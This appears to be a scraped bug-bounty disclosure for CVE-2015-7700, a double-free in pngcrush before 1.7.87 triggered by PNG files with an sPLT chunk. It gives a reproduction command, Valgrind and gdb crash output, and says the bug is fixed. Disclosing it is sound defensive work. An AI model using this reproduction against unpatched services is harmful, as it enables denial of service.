GeeknikH1:93546Internet Bug Bounty: pngcrush double-free/segfault could result in DoS (CVE-2015-7700)
0.002 Low
EPSS
Percentile
64.8%
All versions of pngcrush (pmt.sourceforge.net/pngcrush) prior to version 1.7.87 have a double-free segfault that can be triggered by reading a valid PNG file that contains the sPLT chunk. This bug has been fixed in 1.7.87 by the project maintainer.
Persuading someone to run pngcrush with a valid PNG file that contains the sPLT chunk, or submitting such PNG file remotely to a web-based service that accepts PNG files and processes them with pngcrush, will cause the application to segfault. This can at a minimum cause denial-of-service.
./pngcrush -reduce -brute ps1n0g08.png /dev/null
==56277== Invalid read of size 8
==56277== at 0x44989E: png_free_data (png.c:542)
==56277== by 0x412D99: main (pngcrush.c:6061)
==56277== Address 0x5ac66b0 is 0 bytes after a block of size 32 alloc’d
==56277== at 0x4C26B3F: malloc (vg_replace_malloc.c:299)
==56277== by 0x433A23: pngcrush_debug_malloc (pngcrush.c:2294)
==56277== by 0x478E9E: png_malloc_base (pngmem.c:91)
==56277== by 0x478E9E: png_malloc_array_checked (pngmem.c:115)
==56277== by 0x478E9E: png_realloc_array (pngmem.c:145)
==56277== by 0x4E2A7F: png_set_sPLT (pngset.c:1013)
==56277== by 0x4C93B2: png_handle_sPLT (pngrutil.c:1746)
==56277== by 0x47BE1D: png_read_info (pngread.c:222)
==56277== by 0x40BA8E: main (pngcrush.c:5082)
==56277==
Pointer 0x5555555555555555 not found
==56277== Invalid free() / delete / delete[] / realloc()
==56277== at 0x4C27C59: free (vg_replace_malloc.c:476)
==56277== by 0x4498A6: png_free_data (png.c:542)
==56277== by 0x412D99: main (pngcrush.c:6061)
==56277== Address 0x5555555555555555 is not stack’d, malloc’d or (recently) free’d
==56277==
==56277== Invalid read of size 8
==56277== at 0x4498B1: png_free_data (png.c:543)
==56277== by 0x412D99: main (pngcrush.c:6061)
==56277== Address 0x5ac66c0 is 16 bytes after a block of size 32 alloc’d
==56277== at 0x4C26B3F: malloc (vg_replace_malloc.c:299)
==56277== by 0x433A23: pngcrush_debug_malloc (pngcrush.c:2294)
==56277== by 0x478E9E: png_malloc_base (pngmem.c:91)
==56277== by 0x478E9E: png_malloc_array_checked (pngmem.c:115)
==56277== by 0x478E9E: png_realloc_array (pngmem.c:145)
==56277== by 0x4E2A7F: png_set_sPLT (pngset.c:1013)
==56277== by 0x4C93B2: png_handle_sPLT (pngrutil.c:1746)
==56277== by 0x47BE1D: png_read_info (pngread.c:222)
==56277== by 0x40BA8E: main (pngcrush.c:5082)
==56277==
==56277== Invalid write of size 8
==56277== at 0x4498C8: png_free_data (png.c:544)
==56277== by 0x412D99: main (pngcrush.c:6061)
==56277== Address 0x5ac66b0 is 0 bytes after a block of size 32 alloc’d
==56277== at 0x4C26B3F: malloc (vg_replace_malloc.c:299)
==56277== by 0x433A23: pngcrush_debug_malloc (pngcrush.c:2294)
==56277== by 0x478E9E: png_malloc_base (pngmem.c:91)
==56277== by 0x478E9E: png_malloc_array_checked (pngmem.c:115)
==56277== by 0x478E9E: png_realloc_array (pngmem.c:145)
==56277== by 0x4E2A7F: png_set_sPLT (pngset.c:1013)
==56277== by 0x4C93B2: png_handle_sPLT (pngrutil.c:1746)
==56277== by 0x47BE1D: png_read_info (pngread.c:222)
==56277== by 0x40BA8E: main (pngcrush.c:5082)
==56277==
==56277== Invalid write of size 8
==56277== at 0x4498D0: png_free_data (png.c:545)
==56277== by 0x412D99: main (pngcrush.c:6061)
==56277== Address 0x5ac66c0 is 16 bytes after a block of size 32 alloc’d
==56277== at 0x4C26B3F: malloc (vg_replace_malloc.c:299)
==56277== by 0x433A23: pngcrush_debug_malloc (pngcrush.c:2294)
==56277== by 0x478E9E: png_malloc_base (pngmem.c:91)
==56277== by 0x478E9E: png_malloc_array_checked (pngmem.c:115)
==56277== by 0x478E9E: png_realloc_array (pngmem.c:145)
==56277== by 0x4E2A7F: png_set_sPLT (pngset.c:1013)
==56277== by 0x4C93B2: png_handle_sPLT (pngrutil.c:1746)
==56277== by 0x47BE1D: png_read_info (pngread.c:222)
==56277== by 0x40BA8E: main (pngcrush.c:5082)
==56277==
Best pngcrush method = 105 (ws 11 fm 4 zl 8 zs 0) = 110
for output to /dev/null
(9.84% critical chunk reduction)
(100.00% filesize reduction)
CPU time decoding 0.610, encoding 1.930, other 0.780, total 3.320 sec.
Pointer 0x5555555555555555 not found
Program received signal SIGSEGV, Segmentation fault.
*__GI___libc_free (mem=0x5555555555555555) at malloc.c:3709
3709 malloc.c: No such file or directory.
(gdb) bt
#0 __GI___libc_free (mem=0x5555555555555555) at malloc.c:3709
#1 0x00000000004498a7 in png_free_data () at png.c:542
#2 0x0000000000412d9a in main () at pngcrush.c:6061
(gdb) i r
rax 0x0 0
rbx 0x7864d0 7890128
rcx 0x7ffff789f9d0 140737346402768
rdx 0x7ffff7b56e00 140737349250560
rsi 0x25 37
rdi 0x5555555555555555 6148914691236517205
rbp 0x786750 0x786750
rsp 0x7fffffffcfd0 0x7fffffffcfd0
r8 0x7ffff7fde700 140737354000128
r9 0x1 1
r10 0x0 0
r11 0x246 582
r12 0x20 32
r13 0x20 32
r14 0x1 1
r15 0x100 256
rip 0x7ffff784a939 0x7ffff784a939 <__GI___libc_free+25>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
Related
